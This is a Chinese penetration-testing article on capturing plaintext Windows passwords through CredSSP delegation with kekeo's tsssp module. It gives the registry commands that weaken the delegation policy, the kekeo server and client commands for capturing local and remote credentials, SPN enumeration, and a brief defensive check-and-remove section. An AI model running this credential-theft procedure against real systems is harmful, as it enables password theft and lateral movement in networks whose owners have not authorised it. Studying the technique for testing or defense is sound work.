渗透技巧——通过CredSSP导出用户的明文口令
0x00 前言
在渗透测试中,为了获得Windows系统中的用户口令,通常会选择读取lsass进程的内存。这种方法不仅需要获得系统的管理员权限,而且在更多情况下需要绕过系统对lsass进程的保护。
我在之前的文章《Windows下的密码hash——Net-NTLMv1介绍》曾介绍过使用InternalMonologue获得当前用户凭据的方法(通过SSPI调用对NTLM身份验证包(MSV1_0)的本地过程调用,以计算出NetNTLM响应),不需要对lsass进程操作。
本文将要介绍另外一种获得当前用户口令的方法,同样不需要对lsass进程操作。
这是Benjamin @gentilkiwi Delpy开源的kekeo在2018年添加的功能,只需要修改Windows系统的组策略,就能够以普通用户的权限获得用户的明文口令。
本文将要对其中的原理进行简要介绍,分析不同环境下的利用思路,给出防御建议。
0x01 简介
本文将要介绍以下内容:
- 实现原理
- 实现方法
- 利用分析
- 防御检测
0x02 实现原理
1.基础知识
CredSSP
全称Credential Security Support Provider protocol
CredSSP协议的目的是将用户的明文密码从CredSSP客户端委派给CredSSP服务器
CredSSP通常应用于远程桌面服务(Remote Desktop Protocol)和Windows远程管理(Windows Remote Management)(例如Powershell Remoting)
CredSSP提供了加密的传输层安全协议通道。协商协议使用Kerberos和NTLM
参考资料:
https://docs.microsoft.com/en-us/windows/win32/secauthn/credential-security-support-provider
2.通过组策略设置CredSSP的凭据分配
通过组策略可以指定使用CredSSP组件的应用程序是否发送默认凭据
组策略位置:Computer Configuration
->Administrative Templates
->System
->Credentials Delegation
如下图
Allow delegating default credentials
表示在通过使用受信任的X509证书或Kerberos实现服务器身份验证时自动发送当前用户的凭据
Allow delegating default credentials with NTLM-only server authentication
表示在通过NTLM实现服务器身份验证时自动发送当前用户的凭据
组策略对应的注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation
3.CredSSP的凭据分配在远程桌面服务上的应用
对于工作组环境,需要启用Allow delegating default credentials with NTLM-only server authentication
对于域环境,需要启用Allow delegating default credentials
开启对应的组策略后,在使用远程桌面连接时,会自动发送当前用户的凭据(明文格式,不是hash)
数据结构如下:
TSPasswordCreds ::= SEQUENCE {
domainName [0] OCTET STRING,
userName [1] OCTET STRING,
password [2] OCTET STRING
}
参考资料:
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cssp/17773cc4-21e9-4a75-a0dd-72706b174fe5
4.实现原理
综上,如果我们实现以下操作:
- 修改主机A的组策略,设置为自动发送当前用户的凭据
- 在主机B上面实现服务端的功能,接收主机A发送的请求
那么当我们控制主机A连接主机B时,主机B就能够获得主机A用户的明文口令
CredSSP协议细节可参考:
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cssp/85f57821-40bb-46aa-bfcb-ba9590b8fc30
更近一步,如果我们实现以下操作:
- 修改主机A的组策略,设置为自动发送当前用户的凭据
- 在主机A上面实现服务端的功能,接收主机A自己发送的请求
我们同样能够获得用户的明文口令
注:
keko的实现方式是通过SMB协议创建命名管道,而不是RDP协议
如下图
0x03 实现方法
通过修改注册表的方式添加组策略,命令如下:
reg add hklm\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation /v AllowDefaultCredentials /t REG_DWORD /d 1
reg add hklm\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation /v AllowDefCredentialsWhenNTLMOnly /t REG_DWORD /d 1
reg add hklm\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation /v ConcatenateDefaults_AllowDefault /t REG_DWORD /d 1
reg add hklm\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation /v ConcatenateDefaults_AllowDefNTLMOnly /t REG_DWORD /d 1
reg add hklm\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation\AllowDefaultCredentials /v 1 /t REG_SZ /d *
reg add hklm\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation\AllowDefCredentialsWhenNTLMOnly /v 1 /t REG_SZ /d *
添加组策略后,需要等待用户重新登录并输入凭据后才能生效,例如锁屏、注销或重启等
对于不同的网络环境,实现方法存在差异
1.工作组网络
身份验证方式为NTLM
(1)抓取本机口令
建立服务器的kekeo命令如下(普通用户权限):
tsssp::server
连接服务器的kekeo命令如下(普通用户权限):
tsssp::client /target:anyword
如下图
注:
抓取本机口令时,target
参数可以设置为任意字符
2.域网络
身份验证方式为Kerberos
(1)抓取本机口令
建立服务器的kekeo命令如下(普通用户权限):
tsssp::server
连接服务器的kekeo命令如下(普通用户权限):
tsssp::client /target:anyword
注:
抓取本机口令时,target
参数可以设置为任意字符
(2)抓取远程主机口令
建立服务器的kekeo命令如下(System权限):
tsssp::server
连接服务器的kekeo命令如下(普通用户权限):
tsssp::client /target:TERMSRV/COMPUTER01.test.com /pipe:\\COMPUTER01.test.com\pipe\kekeo_tsssp_endpoint
结果如下图
这里使用的参数为域内计算机帐户对应的SPN
查看当前域内的所有SPN可以使用setspn命令:
setspn.exe -q */*
查看test域内的所有SPN:
setspn.exe -T test -q */*
0x04 利用分析
1.优点
不需要同lsass进程交互,所以能够绕过对lsass进程的保护
在修改组策略后,只需要普通用户权限就能实现
注:
添加组策略后,需要等待用户重新登录并输入凭据后才能生效,例如锁屏、注销或重启等
2.其他利用思路
(1)代码的提取
我将kekeo的tsssp::client
功能单独提取出来,地址如下:
https://github.com/3gstudent/Homework-of-C-Language/blob/master/tsssp_client.cpp
代码支持连接本地和远程服务器
只需要填写pipi参数,我的代码会将target参数自动补全为TERMSRV/<spn>
连接本地的命令示例:
tsssp_client.exe localhost
测试如下图
连接远程服务器的命令示例:
tsssp_client.exe Computer01.test.com
测试如下图
kekeo的tsssp::server
功能需要安装OSS ASN.1/C
注:
使用试用版的OSS ASN.1/C编译生成的exe文件无法在未安装OSS ASN.1/C的系统下使用
(2)抓取其他用户的口令
使用其他用户的token启动kekeo.exe或者tsssp_client.exe即可
token的利用方法可参考《渗透技巧——Token窃取与利用》
0x05 防御检测
1.查询组策略配置
查询注册表的cmd命令如下:
reg query hklm\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation
2.删除组策略配置
删除注册表项的cmd命令如下:
reg delete hklm\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation /f
0x06 小结
本文介绍了kekeo的tsssp
模块在不同环境下的利用方法,结合利用思路给出防御建议。